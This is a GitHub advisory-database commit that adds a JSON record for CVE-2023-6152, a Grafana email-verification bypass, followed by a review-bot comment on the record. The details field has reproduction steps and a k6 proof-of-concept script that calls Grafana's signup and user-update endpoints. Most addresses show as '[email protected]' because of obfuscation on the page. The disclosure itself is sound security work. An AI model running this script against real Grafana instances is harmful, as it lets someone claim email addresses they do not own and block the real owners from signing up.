

advisory-database[bot] committed Feb 13, 2024
1 parent 16d0cb8 commit 44311d2
Showing 1 changed file with 133 additions and 0 deletions.
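--- /dev/null
+++ b/[file path not shown on page]
@@ -0,0 +1,133 @@
+{
+"schema_version": "1.4.0",
+"id": "GHSA-3hv4-r2fm-h27f",
+"modified": "2024-02-13T22:25:10Z",
+"published": "2024-02-13T22:25:10Z",
+"aliases": [
+"CVE-2023-6152"
+],
+"summary": "Email Validation Bypass And Preventing Sign Up From Email's Owner",
+"details": "### Summary\nEmail validation can easily be bypassed because `verify_email_enabled` option enable email validation at sign up only.\nA user changing it's email after signing up (and verifying it) can change it without verification in `/profile`.\nThis can be used to prevent legitimate owner of the email address from signing up.\n\nAnother way to prevent email's owner from signing up is by setting Username as an email:\nWhen a new user is registrering, they can set two different email addresses in the Email and Username field, technically having 2 email addresses (because Grafana handles usernames and emails the same in some situations), but only the former is validated.\n\n![](https://user-images.githubusercontent.com/44581623/282073913-c1a8c20b-b6c3-46eb-840c-9e0dae718a2a.png)\n\nHere user a prevents owner of [email protected] to signup.\n\n### Details\nI don't know exact location but this is related to PUT /api/user handler.\n\n### PoC\nBypass email validation:\n* Start a new grafana instance using latest version\n* Sign up with email foo@example.\n* Login to that account.\n* Go to profile and change email to [email protected]\n* That's it, your using an email you don't own.\n\nPrevent email's owner from signing up:\n* Start a new grafana instance using latest version\n* Sign up with email foo@example.\n* Login to that account.\n* Go to profile and change username (not email) to [[email protected]](mailto:[email protected])\n* Signout.\n* Try to sign up with email [[email protected]](mailto:[email protected])\n* Warning popup \"User with same email address already exists\"\n\nK6 script (with `verify_email_enabled` set to `false`):\n```js\nimport { check, group } from \"k6\"\nimport http from \"k6/http\"\n\nexport const options = {\n scenarios: {\n perVuIter: {\n executor: 'per-vu-iterations',\n vus: 1,\n iterations: 1\n }\n }\n}\n\nconst GRAFANA_URL = __ENV.GRAFANA_URL || \"http://localhost:3000\"\n\nexport default function () {\n group(\"create user_a with email [email protected]\", () => {\n const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({\n \"email\": \"[email protected]\",\n \"password\": \"password\"\n }), {\n headers: {\n 'Content-Type': \"application/json\"\n }\n })\n\n check(response, {\n 'status code is 200': (r) => r.status == 200\n })\n })\n\n group(\"change user_a login to [email protected]\", () => {\n const response = http.put(`${GRAFANA_URL}/api/user`, JSON.stringify({\n \"email\": \"[email protected]\",\n \"login\": \"[email protected]\", // user_b email.\n }), {\n headers: {\n 'Content-Type': \"application/json\"\n }\n })\n\n check(response, {\n 'status code is 200': (r) => r.status == 200\n })\n })\n\n http.cookieJar().clear(GRAFANA_URL)\n\n group(\"create user_b with email [email protected]\", () => {\n const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({\n \"email\": \"[email protected]\",\n \"username\": \"[email protected]\",\n \"password\": \"password\"\n }), {\n headers: {\n 'Content-Type': \"application/json\"\n }\n })\n\n check(response, {\n 'status code is 200': (r) => r.status == 200 // fail\n })\n })\n}\n```\n\n### Impact\nBypass email verification.\nPrevent legitimate owner from signing up.\n",
+"severity": [
+{
+"type": "CVSS_V3",
+"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
+}
+],
+"affected": [
+{
+"package": {
+"ecosystem": "Go",
+"name": "github.com/grafana/grafana"
+},
+"ranges": [
+{
+"type": "ECOSYSTEM",
+"events": [
+{
+"introduced": "2.5.0"
+},
+{
+"fixed": "9.5.16"
+}
+]
+}
+]
+},
+{
+"package": {
+"ecosystem": "Go",
+"name": "github.com/grafana/grafana"
+},
+"ranges": [
+{
+"type": "ECOSYSTEM",
+"events": [
+{
+"introduced": "10.0.0"
+},
+{
+"fixed": "10.0.11"
+}
+]
+}
+]
+},
+{
+"package": {
+"ecosystem": "Go",
+"name": "github.com/grafana/grafana"
+},
+"ranges": [
+{
+"type": "ECOSYSTEM",
+"events": [
+{
+"introduced": "10.1.0"
+},
+{
+"fixed": "10.1.7"
+}
+]
+}
+]
+},
+{
+"package": {
+"ecosystem": "Go",
+"name": "github.com/grafana/grafana"
+},
+"ranges": [
+{
+"type": "ECOSYSTEM",
+"events": [
+{
+"introduced": "10.2.0"
+},
+{
+"fixed": "10.2.4"
+}
+]
+}
+]
+},
+{
+"package": {
+"ecosystem": "Go",
+"name": "github.com/grafana/grafana"
+},
+"ranges": [
+{
+"type": "ECOSYSTEM",
+"events": [
+{
+"introduced": "10.3.0"
+},
+{
+"fixed": "10.3.3"
+}
+]
+}
+]
+}
+],
+"references": [
+{
+"type": "WEB",
+"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
+},
+{
+"type": "PACKAGE",
+"url": "https://github.com/grafana/grafana"
+}
+],
+"database_specific": {
+"cwe_ids": [
+"CWE-863"
+],
+"severity": "MODERATE",
+"github_reviewed": true,
+"github_reviewed_at": "2024-02-13T22:25:10Z",
+"nvd_published_at": null
+}
+}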
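Review bot: The `references` array carries only the bug-bounty WEB link and the PACKAGE link, so nothing in the record backs the five `fixed` versions in `affected` or points consumers at the CVE-2023-6152 alias; an `ADVISORY` entry for the CVE record and a `FIX` entry for the upstream patch would let tooling verify the ranges rather than trust them, e.g. `{ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6152" }`. The PoC in `details` renders every address as `[email protected]`, which is presumably GitHub's email obfuscation on the page rather than the committed text, but if the literal string was carried over from the source advisory the reproduction steps no longer distinguish user_a from user_b and should be restored with placeholder addresses. The CVSS vector and `severity: "MODERATE"` agree with the PR:L requirement the PoC shows (an authenticated account is needed), so that part is consistent.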
